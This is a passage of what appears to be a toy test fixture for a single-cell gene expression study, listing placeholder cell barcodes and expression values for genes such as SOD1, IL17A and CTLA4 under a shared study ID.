"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PIK3CA Expression": {
"name": "PIK3CA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
1.0,
1.0,
2.58,
3.0,
2.81,
1.58,
2.32,
1.0,
3.0,
3.0,
2.32,
2.0,
2.0,
2.58,
2.0,
2.32,
2.0,
2.0,
2.58,
3.0,
2.81,
2.0,
1.58,
2.58,
2.0,
2.58,
2.32,
2.81,
2.81,
3.0,
3.0,
3.0,
2.81,
2.0,
1.58,
1.0,
2.32,
2.0,
2.32,
1.58,
1.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SOD1 Cells": {
"name": "SOD1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SOD1 Expression": {
"name": "SOD1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
1.58,
2.81,
2.81,
2.58,
1.58,
2.58,
2.58,
1.0,
1.58,
1.58,
1.58,
3.0,
3.0,
1.58,
1.0,
1.58,
1.58,
2.81,
2.58,
1.0,
2.81,
2.0,
2.81,
2.58,
2.81,
1.58,
2.58,
1.0,
3.0,
1.0,
3.0,
3.0,
2.81,
2.32,
1.58,
3.0,
2.32,
1.0,
2.58,
3.0,
2.0,
2.81,
2.32,
2.81,
2.58,
2.58,
2.0,
2.0,
2.81,
1.58,
3.0,
3.0,
2.32,
1.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL17A Cells": {
"name": "IL17A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL17A Expression": {
"name": "IL17A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.81,
2.0,
2.58,
1.0,
1.0,
2.0,
3.0,
2.81,
1.58,
1.58,
2.32,
2.81,
1.58,
1.58,
3.0,
2.0,
2.32,
2.81,
2.32,
2.0,
1.0,
1.58,
1.0,
2.58,
3.0,
2.32,
1.0,
2.81,
2.58,
2.81,
2.58,
1.0,
1.58,
2.81,
2.81,
2.81,
2.32,
2.58,
1.58,
1.58,
3.0,
1.58,
2.0,
1.58,
2.81,
1.58,
2.32,
3.0,
2.81,
2.0,
2.58,
2.0,
2.32,
2.58,
2.58,
1.58,
2.0,
2.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-A Cells": {
"name": "HLA-A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-A Expression": {
"name": "HLA-A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.32,
2.58,
3.0,
1.58,
2.81,
2.32,
2.32,
1.58,
2.32,
1.58,
1.58,
1.0,
2.58,
2.0,
2.32,
2.81,
2.58,
3.0,
1.58,
1.58,
2.81,
1.0,
2.58,
2.0,
3.0,
3.0,
1.58,
1.58,
2.32,
2.81,
2.58,
2.58,
3.0,
2.81,
2.81,
2.81,
2.58,
1.58,
2.58,
3.0,
1.0,
2.0,
3.0,
2.0,
3.0,
2.32,
2.58,
2.58,
1.58,
1.0,
2.0,
1.0,
1.0,
3.0,
2.0,
2.81,
2.32,
2.81,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR2 Cells": {
"name": "TLR2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR2 Expression": {
"name": "TLR2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
1.58,
2.58,
2.81,
1.0,
3.0,
2.58,
1.0,
2.81,
2.58,
1.0,
2.81,
1.58,
2.32,
1.58,
1.58,
1.58,
2.58,
2.0,
2.32,
2.81,
2.81,
2.32,
1.58,
2.81,
2.32,
2.32,
1.0,
1.58,
2.58,
1.58,
2.32,
1.58,
1.58,
2.81,
1.58,
3.0,
2.0,
1.58,
1.0,
3.0,
2.0,
2.81,
2.81,
3.0,
3.0,
2.32,
2.81,
2.0,
2.32,
2.58,
2.81,
2.81,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTLA4 Cells": {
"name": "CTLA4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTLA4 Expression": {
"name": "CTLA4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.32,
2.0,
2.81,
1.58,
2.32,
2.32,
2.0,
2.32,
2.0,
2.32,
1.0,
3.0,
2.81,
1.0,
3.0,
1.0,
3.0,
3.0,
1.0,
3.0,
1.0,
3.0,
1.0,
3.0,
2.81,
2.32,
2.32,
1.58,
3.0,
3.0,
1.58,
2.32,
2.81,
1.58,
2.32,
1.58,
2.81,
2.81,
2.0,
2.81,
1.58,
2.81,
2.32,
1.0,
1.58,
2.81,
2.81,
2.58,
3.0,
2.0,
3.0,
2.58,
2.0,
3.0,
1.0,
3.0,
1.58,
2.32,
2.32,
2.32,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F5 Cells": {
"name": "F5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
